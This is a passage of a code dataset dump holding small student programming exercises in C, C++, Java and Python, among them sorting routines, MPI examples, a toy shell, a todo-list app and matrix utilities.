std::match_results;\nusing std::regex_match;\nusing std::cmatch;\n\nstring Global::gameSessionId = \"\";\nlong Global::score = 0;\n\nGlobal::Global()\n{\n}\n\nGlobal::~Global()\n{\n}\n\nstring Global::vectorChar2String(vector<char> *buffer) {\n\tstring rst;\n\tfor (char ch : *buffer) {\n\t\trst.push_back(ch);\n\t}\n\treturn rst;\n}\n\nstring Global::getSessionIdFromHeader(string head) {\n\tregex nlp(\"\\\\r\\\\n\");\n\tstring header = regex_replace(head, nlp, \" \");\n\tregex pattern(\".*GAMESESSIONID=(.*) Content-Type.*\");\n\t//match_results<std::string::const_iterator> result;\n\tcmatch result;\n\tbool valid = regex_match(header.c_str(), result, pattern);\n\n\tif (!valid) {\n\t\treturn \"\";\n\t}\n\treturn result[1];\n}" }, { "alpha_fraction": 0.35433071851730347, "alphanum_fraction": 0.3818897604942322, "avg_line_length": 17.14285659790039, "blob_id": "4c8c26e55f50b76eb7b0d250da5ade89ab520bab", "content_id": "33c48ded3166c177204431e7e1a51e464f1ab9e5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 508, "license_type": "permissive", "max_line_length": 50, "num_lines": 28, "path": "/c/hardwork/hardway/sort_acs(bubble).c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for scanf() printf()\n\nint *sortAsc(int *n, int _n) {\n int temp;\n for (int i = 0; i < _n - 1; i++) {\n for (int j = 0; j < _n - 1; j++) {\n if (n[j] > n[j + 1]) {\n temp = n[j + 1];\n n[j + 1] = n[j];\n n[j] = temp;\n }\n }\n }\n return n;\n}\n\nint main() {\n int arr[5];\n int j;\n for (j = 0; j < 5; j++) {\n scanf(\"%d\", &arr[j]);\n }\n int *p = sortAsc(arr, 5);\n int i;\n for (i = 0; i < 5; i++) printf(\"%d \", *(p + i));\n printf(\"\\n\");\n return 0;\n}\n" }, { "alpha_fraction": 0.739130437374115, "alphanum_fraction": 0.7639751434326172, "avg_line_length": 31.399999618530273, "blob_id": "a9c242e26252fbfdf7d1acffca6e364a8a001f93", "content_id": "a0d30cc9623340658df72840e7b64b28ca9b11b6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 161, "license_type": "permissive", "max_line_length": 73, "num_lines": 5, "path": "/c/projects/socket/UDP/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "use `bash make` to compile\n\nin my computer, only 15.28% of UDP package can be received\n\nas about the reasons, maybe the buffer size is full then it begins lost(X" }, { "alpha_fraction": 0.6109660863876343, "alphanum_fraction": 0.6214098930358887, "avg_line_length": 22.24242401123047, "blob_id": "a7579e249e216c0902003e5a8f8a455d448a1124", "content_id": "2d958e7527bd78c79d0a695bc792a6887e676ef3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 830, "license_type": "permissive", "max_line_length": 65, "num_lines": 33, "path": "/c/projects/MPI/hardway/MPI_group_create.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 基于已经存在的进程组创建一个新的组,并指明被包含(included)其中的成员进程。\n\n#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs, odd_rank;\n MPI_Group group_world, odd_group;\n int i;\n int members[10];\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n MPI_Comm_group(MPI_COMM_WORLD, &group_world);\n\n for (i = 0; i < numprocs / 2; i++) {\n members[i] = 2 * i + 1;\n }\n\n // int MPI_Group_incl(MPI_Group old_group, int count, \n // int *members, MPI_Group *new_group)\n MPI_Group_incl(group_world, numprocs / 2, members, &odd_group);\n\n MPI_Group_rank(odd_group, &odd_rank);\n\n printf(\"In process %d: odd rank is %d\\n\", myid, odd_rank);\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.6179310083389282, "alphanum_fraction": 0.6183907985687256, "avg_line_length": 29.22222137451172, "blob_id": "55f67548b3205076d425a8afaa5da03811cb19bc", "content_id": "fe5c0b684a9edee63ccbb4b85799162b2e8a8ec7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2175, "license_type": "permissive", "max_line_length": 109, "num_lines": 72, "path": "/java/projects/todolist/src/main/java/TodoList/Controller.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "package TodoList;\n\nimport java.io.IOException;\nimport java.lang.reflect.Array;\nimport java.lang.reflect.Type;\nimport java.nio.charset.Charset;\nimport java.nio.file.FileAlreadyExistsException;\nimport java.nio.file.Files;\nimport java.nio.file.Path;\nimport java.nio.file.Paths;\nimport java.util.*;\nimport java.util.stream.Collectors;\n\nimport com.google.gson.Gson;\nimport com.google.gson.GsonBuilder;\nimport com.google.gson.reflect.TypeToken;\nimport org.omg.PortableInterceptor.SYSTEM_EXCEPTION;\n\npublic class Controller {\n\n List<Note> notes;\n static final String fileName = \"notes.json\";\n\n public Controller() {\n Gson gson = new GsonBuilder().setPrettyPrinting().create();\n Path filePath = Paths.get(fileName);\n Type collectionType = new TypeToken<LinkedList<Note>>() {}.getType();\n try {\n notes = gson.fromJson(\n Files.readAllLines(filePath).stream().collect(Collectors.joining(\"\\n\")), collectionType);\n if (notes == null) throw new IOException(\"Empty file\");\n System.out.println(\"Read data\");\n } catch (IOException e) {\n notes = new LinkedList<Note>();\n System.out.println(\"Initial data\");\n }\n }\n\n public void addNote(String title, String content) {\n notes.add(new Note(title, content));\n }\n\n public void deleteNote(String title) {\n notes.removeIf(note -> note.title.equals(title));\n }\n\n public void printAllNote() {\n // System.out.println(notes);\n for (Note note : notes) {\n note.print();\n }\n }\n\n public void saveData() {\n Gson gson = new GsonBuilder().setPrettyPrinting().create();\n try {\n\n try {\n Files.createFile(Paths.get(fileName));\n System.out.println(\"Create data\");\n } catch (FileAlreadyExistsException e) {\n System.out.println(\"Update data\");\n }\n Files.write(Paths.get(fileName),\n new ArrayList<String>(Arrays.asList(gson.toJson(notes).split(\"\\n\"))),\n Charset.forName(\"UTF-8\"));\n } catch (IOException e) {\n e.printStackTrace();\n }\n\n }\n}" }, { "alpha_fraction": 0.3653465211391449, "alphanum_fraction": 0.41485148668289185, "avg_line_length": 16.11864471435547, "blob_id": "c671c8e3bc3df857689095cd2abe3f89da158f9a", "content_id": "155e785ae055e0efadd1a4e25f956736580a99d0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1010, "license_type": "permissive", "max_line_length": 49, "num_lines": 59, "path": "/c/hardwork/hardway/sort_string(index).c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for scanf()\n#include <string.h> // for printf()\n\nint a[128];\nchar *sortString(const char *const s) {\n int n = strlen(s);\n static char str[100005];\n\n for (int i = 0; i < 128; i++) {\n a[i] = 0;\n }\n\n for (int i = 0; i < n; i++) {\n a[s[i]]++;\n }\n int j = 0;\n for (int i = 0; i < 128; i++) {\n while (a[i] != 0) {\n str[j] = i;\n a[i]--;\n j++;\n }\n }\n return str;\n}\nvoid sortString2(const char *const s, char *s1) {\n int n = strlen(s);\n for (int i = 0; i < 128; i++) {\n a[i] = 0;\n }\n for (int i = 0; i < n; i++) {\n a[s[i]]++;\n }\n int j = 0;\n for (int i = 0; i < 128; i++) {\n while (a[i] != 0) {\n s1[j] = i;\n a[i]--;\n j++;\n }\n }\n return;\n}\n\nint main() {\n char a[] = \"123456\";\n char *p = sortString(a);\n for (int i = 0; p[i] != '\\0'; i++) {\n printf(\"%c\", p[i]);\n }\n putchar('\\n');\n char *p2 = a;\n sortString2(a, p2);\n for (int i = 0; p[i] != '\\0'; i++) {\n printf(\"%c\", p[i]);\n }\n putchar('\\n');\n return 0;\n}\n" }, { "alpha_fraction": 0.5471698045730591, "alphanum_fraction": 0.5576519966125488, "avg_line_length": 21.20930290222168, "blob_id": "3f618721978c8e13453022e1395da1afd79a340a", "content_id": "21d7ec51c54999030f844553c82009c119bd99d0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1044, "license_type": "permissive", "max_line_length": 73, "num_lines": 43, "path": "/c/projects/MPI/hardway/MPI_scatter.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 与收集(gather)相对应也有一个相反的集合通信操作,\n// 即根进程向所有进程发送缓冲区的数据,称为散发。\n\n#include <mpi.h>\n#include <stdio.h>\n#include <stdlib.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs;\n int source = 0;\n int *sbuf;\n int rbuf[5];\n int i;\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n if (myid == source) {\n sbuf = (int *)malloc(numprocs * 5 * sizeof(int));\n\n for (int i = 0; i < numprocs * 5; i++) {\n sbuf[i] = i;\n }\n }\n\n // int MPI_Scatter(void* sendbuf, int sendcount, MPI_Datatype sendtype,\n // void* recvbuf, int recvcount, MPI_Datatype recvtype,\n // int root, MPI_Comm comm)\n MPI_Scatter(sbuf, 5, MPI_INT,\n rbuf, 5, MPI_INT,\n source, MPI_COMM_WORLD);\n\n printf(\"Now is process %d: \", myid);\n for (i = 0; i < 5; i++) {\n printf(\"array[%d]=%d\\t\", i, rbuf[i]);\n }\n printf(\"\\n\");\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.5788235068321228, "alphanum_fraction": 0.5952941179275513, "avg_line_length": 20.794872283935547, "blob_id": "a0993606a2def2ebda1feeb8c485d97b7611e5ba", "content_id": "ccbe1eda9e359eaef86017aa92f60085795e742a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 850, "license_type": "permissive", "max_line_length": 85, "num_lines": 39, "path": "/java/projects/algorithms/chapter1/part1/Q21.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "\n/**\n * Q21\n */\nimport java.util.ArrayList;\nimport java.util.Scanner;\n\npublic class Q21 {\n\n public static void main(String[] args) {\n Scanner scanner = new Scanner(System.in);\n ArrayList arrayList = new ArrayList<Q21Score>();\n\n while (scanner.hasNext()) {\n String name = \"\";\n int totalScore = 0;\n int getScore = 0;\n\n if (scanner.hasNext())\n name = scanner.next();\n else\n continue;\n if (scanner.hasNextInt())\n totalScore = scanner.nextInt();\n else\n continue;\n if (scanner.hasNextInt())\n getScore = scanner.nextInt();\n else\n continue;\n Q21Score newScore = new Q21Score(name, totalScore, getScore);\n arrayList.add(newScore);\n }\n\n arrayList.stream().forEach(x -> System.out.println(((Q21Score) x).printScore()));\n\n scanner.close();\n }\n\n}" }, { "alpha_fraction": 0.4301270544528961, "alphanum_fraction": 0.45916515588760376, "avg_line_length": 10.702127456665039, "blob_id": "07b98956c38136643e30961a81183507a9f07cd6", "content_id": "2a4fc417c6ff72a2a185bd765b08e00093166fdd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 630, "license_type": "permissive", "max_line_length": 63, "num_lines": 47, "path": "/c/docs/Algorithms.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "---\nlayout: post\ntitle: \"C_Code\"\ndate: 2017-02-01\ntags:\n - Code\n - Algorithm\n - C\n - Todo\ncategories:\n - Code\n---\n\n一些常用的算法,C描述\n# C_Code\n\n```C\n#include<stdio.h>\n\n\n\nint com(int m,int n)//m中取n个\n{\n    int i,j,sum=1;\n    for (i=m,j=0;j<n;j++,i--)\n    {\n        sum=sum*i/(j+1);\n    }\n    return sum;\n}\nint main()\n{\n    int i;\n    i=com(5,3);\n    printf(\"%d\",i);\n    return 0;\n}\n\n```\n\n```c\nint GCD(int a, int b) { return (0 == b) ? a :GCD(b,a%b);}\n```\n\n```C\nint getSum(int a, int b) { return !(a)?b:getSum((a&b)<<1,a^b);}\n```\n\n" }, { "alpha_fraction": 0.3111332058906555, "alphanum_fraction": 0.348906546831131, "avg_line_length": 22.395349502563477, "blob_id": "433febcd415e70b610e40b5a3b122ee6390bbaec", "content_id": "a36c59aaf47448f7c937e8eefa2ad923438560ce", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1006, "license_type": "permissive", "max_line_length": 59, "num_lines": 43, "path": "/c/hardwork/hardway/count_letter.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n#include <ctype.h>\n\nint countLetters(const char* const str) {\n int i = 0;\n int n = 0;\n while (*(str + i) != '\\0') {\n if ((*(str + i) >= 'A' && *(str + i) <= 'Z') ||\n ((*(str + i) >= 'a') && *(str + i) <= 'z'))\n n++;\n i++;\n }\n return n;\n}\n\nint* count(const char* const s) {\n static int a[15];\n long long i = 0;\n while (*(s + i) != '\\0') {\n if (*(s + i) == '0') a[0]++;\n if (*(s + i) == '1') a[1]++;\n if (*(s + i) == '2') a[2]++;\n if (*(s + i) == '3') a[3]++;\n if (*(s + i) == '4') a[4]++;\n if (*(s + i) == '5') a[5]++;\n if (*(s + i) == '6') a[6]++;\n if (*(s + i) == '7') a[7]++;\n if (*(s + i) == '8') a[8]++;\n if (*(s + i) == '9') a[9]++;\n i++;\n }\n return a;\n}\n\nint main() {\n char list[] = {'a', 'b', 'a', 'c', '\\0', 'a'};\n int i = countLetters(list);\n char a[] = {'1', '2', '2', '\\0', '3', 'A', 'B', '3'};\n\n int* counts = count(a);\n for (int i = 0; i < 2 * 5; i++) printf(\"%d \", counts[i]);\n return 0;\n}\n" }, { "alpha_fraction": 0.5042253732681274, "alphanum_fraction": 0.5323943495750427, "avg_line_length": 16.75, "blob_id": "8fff8d888ef6c3e6c4ceab1c328d23a0fc9b3bec", "content_id": "657118eaac17695e8e58d36d0f81f2571c2ad7f5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 355, "license_type": "permissive", "max_line_length": 49, "num_lines": 20, "path": "/c/hardwork/hardway/bin_to_dec.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n#include <string.h> // for strlen()\n\nint parseBinary(const char* const binaryString) {\n int i = 0;\n\n int ans = 0;\n while (*(binaryString + i) != '\\0') {\n ans *= 2;\n ans += ((*(binaryString + i)) - 48);\n i++;\n }\n return ans;\n}\n\nint main() {\n char a[] = \"111\";\n printf(\"%d\", parseBinary(a));\n return 0;\n}\n" }, { "alpha_fraction": 0.48896434903144836, "alphanum_fraction": 0.6146010160446167, "avg_line_length": 31.72222137451172, "blob_id": "4a8d94ffd0295f64832fc14f4ae25be3c6d42cd6", "content_id": "da41c48cb3c7b3b0abd412075bf46b302bfce9fd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 589, "license_type": "permissive", "max_line_length": 95, "num_lines": 18, "path": "/c/hardwork/library/stdlib/strtoll.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> /* printf, NULL */\n#include <stdlib.h> /* strtoll */\n\nint main ()\n{\n char szNumbers[] = \"1856892505 17b00a12b -01100011010110000010001101100 0x6fffff 19\";\n char* pEnd;\n long long int lli1, lli2, lli3, lli4, lli5;\n lli1 = strtoll (szNumbers, &pEnd, 10);\n printf(\"|%c|\", pEnd[0]);\n lli2 = strtoll (pEnd, &pEnd, 16);\n lli3 = strtoll (pEnd, &pEnd, 2);\n lli4 = strtoll (pEnd, &pEnd, 0);\n lli5 = strtoll (pEnd, &pEnd, 8);\n printf(\"|%10s|\", pEnd);\n printf (\"The decimal equivalents are: %lld, %lld, %lld and %lld.\\n\", lli1, lli2, lli3, lli4);\n return 0;\n}\n" }, { "alpha_fraction": 0.3325892984867096, "alphanum_fraction": 0.3660714328289032, "avg_line_length": 17.285715103149414, "blob_id": "eb74870da6d76f4728b2cd9b6e2f4f61b094b653", "content_id": "5c9d0de8a7019be8209a3ff5fcfcd210205cdc26", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 896, "license_type": "permissive", "max_line_length": 55, "num_lines": 49, "path": "/c/hardwork/hardway/gcd.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint gcd(int a, int b) {\n if (b == 0)\n return a;\n else\n gcd(b, a % b);\n}\n\nint main() {\n struct ans {\n int left;\n int right;\n float x;\n } a[10000];\n\n int N;\n scanf(\"%d\", &N);\n int k = 0;\n for (int i = 1; i <= N; i++) {\n for (int j = 1; j <= N; j++) {\n if (gcd(i, j) == 1) {\n if (i < j) {\n a[k].left = i;\n a[k].right = j;\n a[k].x = (float)i / j;\n k++;\n }\n }\n }\n }\n int temp, num[10000] = {0};\n for (int i = 0; i < k; i++) num[i] = i;\n for (int i = 0; i < k - 1; i++) {\n for (int j = 0; j < k - 1; j++) {\n if (a[num[j]].x > a[num[j + 1]].x) {\n temp = num[j];\n num[j] = num[j + 1];\n num[j + 1] = temp;\n }\n }\n }\n\n printf(\"0/1\\n\");\n for (int i = 0; i < k; i++)\n printf(\"%d/%d\\n\", a[num[i]].left, a[num[i]].right);\n printf(\"1/1\\n\");\n return 0;\n}\n" }, { "alpha_fraction": 0.35685884952545166, "alphanum_fraction": 0.416500985622406, "avg_line_length": 35.25925827026367, "blob_id": "5e9ca82370719f8d0817dcf14f392d5c33c51358", "content_id": "87e3eaa20f290c4500e1057bc8aae78b30cff4a7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1006, "license_type": "permissive", "max_line_length": 68, "num_lines": 27, "path": "/python36/projects/money-and-computer/main.py", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "TABLE = [\r\n \"Name \", \"Price(k) \", \"Time(y) \", \"Current \",\r\n \"Laptop \", \"14 \", \"4+ \", \"MacBook Pro \",\r\n \"Phone \", \"8 \", \"3+ \", \"MI MIX 2S \",\r\n \"Console \", \"12 \", \"8+ \", \"PlayStation4 / Switch \",\r\n \"Monitor \", \"5 \", \"5+ \", \"Dell U2515h \",\r\n \"PC \", \"8 \", \"5+ \", \"I5 16G 256SSD GTX750Ti \",\r\n \"Tablet \", \"5 \", \"4+ \", \"Surface Pro 3 \"]\r\n\r\nif __name__ == \"__main__\":\r\n print(\"Money and Computer\")\r\n\r\n # # too stupid some how\r\n # for i in range(1, len(TABLE) // 4):\r\n # pass\r\n\r\n result = [int(i[0]) / (int(i[1][::-1]) * 12)\r\n for i in zip(TABLE[1 + 4::4], TABLE[2 + 4::4])]\r\n\r\n def print_line(x, y): return print(\r\n (\"{}| \" * 5)[:-2].format(*(x[0:3] + [y] + x[3:4])))\r\n\r\n print_line(TABLE[0:5], \"Pay \")\r\n for x in range(len(result)):\r\n print_line(TABLE[0+4*(x+1):5+4*(x+1)], str(result[x])[:4] + \" \")\r\n\r\n print(\"each month pay total: <{:0.2}k> (k/m)\".format(sum(result)))\r\n" }, { "alpha_fraction": 0.6707503795623779, "alphanum_fraction": 0.6766571998596191, "avg_line_length": 30.96503448486328, "blob_id": "bb6a731cb57f443701b8f04b4f72fe4d8e4f3f8c", "content_id": "c319476275b2e752ad6924fe5326948c1677a828", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 4579, "license_type": "permissive", "max_line_length": 80, "num_lines": 143, "path": "/c/projects/POSIX/Lab1/4.1.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for puts(), printf(), feof()\n#include <stdlib.h> // for no warn about wait()\n#include <string.h> // for strtok(), strlen()\n#include <unistd.h> // for fork(), wait()\n\n#define MAX_LINE 80\n#define HISTORY_SIZE 10\n#define HELP_MESSAGE \"sh: \"\n\n// store history \nstruct {\n char history[HISTORY_SIZE][MAX_LINE];\n int begin;\n int size;\n} data;\n\n// print history\nvoid printHistory() {\n puts(\"\");\n int i = 0;\n for (; i < data.size; i++) {\n int index = (data.begin + i) % HISTORY_SIZE;\n printf(\"%s\", data.history[index]);\n }\n}\n\n// add history\nvoid addHistory(char *str) {\n int index = (data.begin + data.size) % HISTORY_SIZE;\n strcpy(data.history[index], str);\n if (data.size == HISTORY_SIZE) {\n data.begin = (data.begin + 1) % HISTORY_SIZE;\n } else {\n data.size++;\n }\n}\n\n// pricess signal, not kill process\nvoid process_signal(int sign_num) {\n printHistory();\n}\n\n//most inportant set up function\nvoid setup(char inputBuffer[], char *args[], int *background) {\n // read input \n fgets(inputBuffer, MAX_LINE, stdin);\n // process EOF and skip empty line\n if (feof(stdin)) exit(0);\n if (inputBuffer[0] == '\\n' && strlen(inputBuffer) == 1) return;\n // add history\n addHistory(inputBuffer);\n // slice input to args \n // attention please! only one white char in allowed between two args\n char *pch = strtok(inputBuffer, \" \\t\\n\");\n int i = 0;\n for (; pch != NULL; i++) {\n args[i] = pch;\n // printf(\"|%s|\",args[i]);\n pch = strtok(NULL, \" \\n\");\n }\n // check background or not \n *background = (int)(strcmp(args[i - 1], \"&\") == 0);\n // printf(\"%d\", *background);\n if (*background) args[i - 1] = NULL;\n \n int pid = fork();\n if (pid == 0) execvp(args[0], args);\n // if not background, wait it finished\n if (*background != 1) wait(NULL);\n}\n\n// mian func like book example\nint main() {\n signal(SIGINT, process_signal);\n\n char inputBuffer[MAX_LINE];\n int background;\n char *args[MAX_LINE / 2 + 1];\n\n while (1) {\n background = 0;\n printf(\"%s\", HELP_MESSAGE);\n // print stdout buffer \n fflush(stdout);\n \n setup(inputBuffer, args, &background);\n }\n}\n\n// about exec\n// \n// \n// C language prototypes\n// The POSIX standard declares exec functions in the unistd.h header file, in C\n// language. The same functions are declared in process.h for DOS (see below),\n// OS/2, and Microsoft Windows.\n\n// int execl(char const *path, char const *arg0, ...);\n// int execle(char const *path, char const *arg0, ..., char const *envp[]);\n// int execlp(char const *file, char const *arg0, ...);\n// int execv(char const *path, char const *argv[]);\n// int execve(char const *path, char const *argv[], char const *envp[]);\n// int execvp(char const *file, char const *argv[]);\n// Some implementations provide these functions named with a leading underscore\n// (e.g. _execl).\n\n// The base of each is exec (execute), followed by one or more letters:\n\n// e – An array of pointers to environment variables is explicitly passed to the\n// new process image.\n// l – Command-line arguments are passed individually (a list) to the function.\n// p – Uses the PATH environment variable to find the file named in the file\n// argument to be executed.\n// v – Command-line arguments are passed to the function as an array (vector) of\n// pointers.\n// path\n// The argument specifies the path name of the file to execute as the new\n// process image. Arguments beginning at arg0 are pointers to arguments to be\n// passed to the new process image. The argv value is an array of pointers to\n// arguments.\n\n// arg0\n// The first argument arg0 should be the name of the executable file. Usually it\n// is the same value as the path argument. Some programs may incorrectly rely on\n// this argument providing the location of the executable, but there is no\n// guarantee of this nor is it standardized across platforms.\n\n// envp\n// Argument envp is an array of pointers to environment settings. The exec calls\n// named ending with an e alter the environment for the new process image by\n// passing a list of environment settings through the envp argument. This\n// argument is an array of character pointers; each element (except for the\n// final element) points to a null-terminated string defining an environment\n// variable.\n\n// Each null-terminated string has the form:\n\n// name=value\n// where name is the environment variable name, and value is the value of that\n// variable. The final element of the envp array must be null.\n\n// In the execl, execlp, execv, and execvp calls, the new process image inherits\n// the current environment variables.\n" }, { "alpha_fraction": 0.7215189933776855, "alphanum_fraction": 0.75443035364151, "avg_line_length": 35, "blob_id": "c0a2cab2964b397d6077fed7e4be5e62365c7a23", "content_id": "8f96ec9682ee6e264984fbf3d9b3a3a35019d1fa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 395, "license_type": "permissive", "max_line_length": 255, "num_lines": 11, "path": "/java/hardwork/junit/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Junit\n`jskyzero` `2017/12/31`\n\n## Overview\n\nJUnit is a unit testing framework for the Java programming language. JUnit has been important in the development of test-driven development, and is one of a family of unit testing frameworks which is collectively known as xUnit that originated with SUnit.\n\n## Install && Run\n1. download `junit-4.9.jar` to this folder\n2. `chmod a+x test`\n3. `./test`" }, { "alpha_fraction": 0.3786407709121704, "alphanum_fraction": 0.4223301112651825, "avg_line_length": 17.727272033691406, "blob_id": "b291c3a441ae820fc4eea9f83c06d465674981b1", "content_id": "9a8711077776033e6ffbc3adf0b6ee6db7af071f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 206, "license_type": "permissive", "max_line_length": 34, "num_lines": 11, "path": "/c/hardwork/hardway/mod_by_five.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n\nint main() {\n int a[5] = {1, 2, 3, 4, 5};\n int i;\n for (i = 0; i < 5; i++)\n if ((char)a[i] == '5')\n printf(\"%d\\n\", a[i]);\n else\n printf(\"FAILED\\n\");\n}\n" }, { "alpha_fraction": 0.6953316926956177, "alphanum_fraction": 0.6953316926956177, "avg_line_length": 19.350000381469727, "blob_id": "69068bf370a07e0fbfa456bef2485b6678304340", "content_id": "475d19c89658374567e680d9cc4db99225cb0233", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 407, "license_type": "permissive", "max_line_length": 73, "num_lines": 20, "path": "/c/projects/sniff/capture.h", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#ifndef __CAPTURE_H\n#define __CAPTURE_H\n\n#include <arpa/inet.h>\n#include <errno.h>\n#include <netinet/if_ether.h>\n#include <netinet/in.h>\n#include <netinet/ip.h>\n#include <pcap.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <sys/socket.h>\n#include <time.h>\n\n#include <buffer.h>\n\n/* callback foo for the capture library */\nvoid pcap_callback(u_char *, const struct pcap_pkthdr *, const u_char *);\n\n#endif\n" }, { "alpha_fraction": 0.5130513310432434, "alphanum_fraction": 0.522652268409729, "avg_line_length": 24.450382232666016, "blob_id": "201420bcc304c8f6ddbce8c2e4a9b4629072cd47", "content_id": "ae61373bc0acac23af25fd5f5e8682eaa8e18ad2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3333, "license_type": "permissive", "max_line_length": 124, "num_lines": 131, "path": "/java/projects/algorithms/chapter1/part1/Q33Matrix.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import java.util.stream.IntStream;\n\n/**\n * Q33Matrix\n */\n\npublic class Q33Matrix {\n\n public static double dot(double[] x, double[] y) {\n return IntStream.range(0, Math.min(x.length, y.length)).mapToDouble(i -> x[i] * y[i]).sum();\n }\n\n public static double[][] mult(double[][] x, double[][] y) {\n int m = x.length, n = y[0].length;\n double[][] result = new double[m][n];\n\n for (int i = 0; i < m; i++) {\n for (int j = 0; j < n; j++) {\n final int colIndex = j;\n double[] col = IntStream.range(0, y.length).mapToDouble(rowIndex -> y[rowIndex][colIndex]).toArray();\n result[i][j] = dot(x[i], col);\n }\n }\n\n return result;\n }\n\n public static double[][] transpose(double[][] a) {\n int m = a.length, n = a[0].length;\n double[][] result = new double[n][m];\n\n for (int i = 0; i < m; i++) {\n for (int j = 0; j < n; j++) {\n result[j][i] = a[n - 1 - j][m - 1 - i];\n }\n }\n return result;\n }\n\n public static double[] mult(double[][] a, double[] x) {\n int m = a.length, n = Math.min(a[0].length, x.length);\n double[] result = new double[m];\n for (int i = 0; i < m; i++) {\n result[i] = dot(a[i], x);\n }\n return result;\n }\n\n public static double[] mult(double[] x, double[][] a) {\n int m = Math.min(a.length, x.length), n = a[0].length;\n double[] result = new double[n];\n for (int i = 0; i < n; i++) {\n final int colIndex = i;\n double[] col = IntStream.range(0, m).mapToDouble(rowIndex -> a[rowIndex][colIndex]).toArray();\n result[i] = dot(x, col);\n }\n return result;\n }\n\n public static void print(double[][] matrix) {\n int m = matrix.length, n = matrix[0].length;\n for (int i = 0; i < m; i++) {\n for (int j = 0; j < n; j++) {\n System.out.printf(\"%5f \", matrix[i][j]);\n }\n System.out.println();\n }\n }\n\n public static void print(double[] array) {\n IntStream.range(0, array.length).forEach(i -> System.out.printf(\"%5f%s\", array[i], i + 1 == array.length ? \"\\n\" : \" \"));\n }\n}\n\n// bellow is a test example, but in fact don't need to be such complex\n// make things simple please\n\n// \n// import java.io.ByteArrayOutputStream;\n// import java.io.IOException;\n// import java.util.ArrayList;\n\n// public class Q33Matrix<T> {\n// private int m, n;\n// private ArrayList data;\n// // m * n\n\n// public Q33Matrix(int m, int n) {\n// this.m = m;\n// this.n = n;\n\n// data = new ArrayList<T>(size());\n// System.out.print(size());\n// System.out.print(data.size());\n// }\n\n// public T get(int m, int n) {\n// return (T) data.get(index(m, n));\n// }\n\n// public int rowSize() {\n// return m;\n// }\n\n// public int colSize() {\n// return n;\n// }\n\n// public int size() {\n// return m * n;\n// }\n\n// private int index(int raw, int col) {\n// return raw * colSize() + col;\n// }\n\n// public String toString() {\n// try {\n// ByteArrayOutputStream out = new ByteArrayOutputStream();\n// for (int i = 0; i < m; i++) {\n// for (int j = 0; j < n; j++) {\n// out.write(String.format(\"%s\\n\", get(i, j).toString()).getBytes());\n// }\n// out.write(\"\\n\".getBytes());\n// }\n// return new String(out.toByteArray());\n// } catch (IOException e) {\n// return e.toString();\n// }\n// }\n// }" }, { "alpha_fraction": 0.5306586027145386, "alphanum_fraction": 0.5488266348838806, "avg_line_length": 28.35555648803711, "blob_id": "f1486d82aa1861120a6979edf0721ddd554e27b5", "content_id": "cc91c0eb93768b177f22e9babae3ccd76e37de06", "detected_licenses": [ "MIT" ], "is_generated": false, 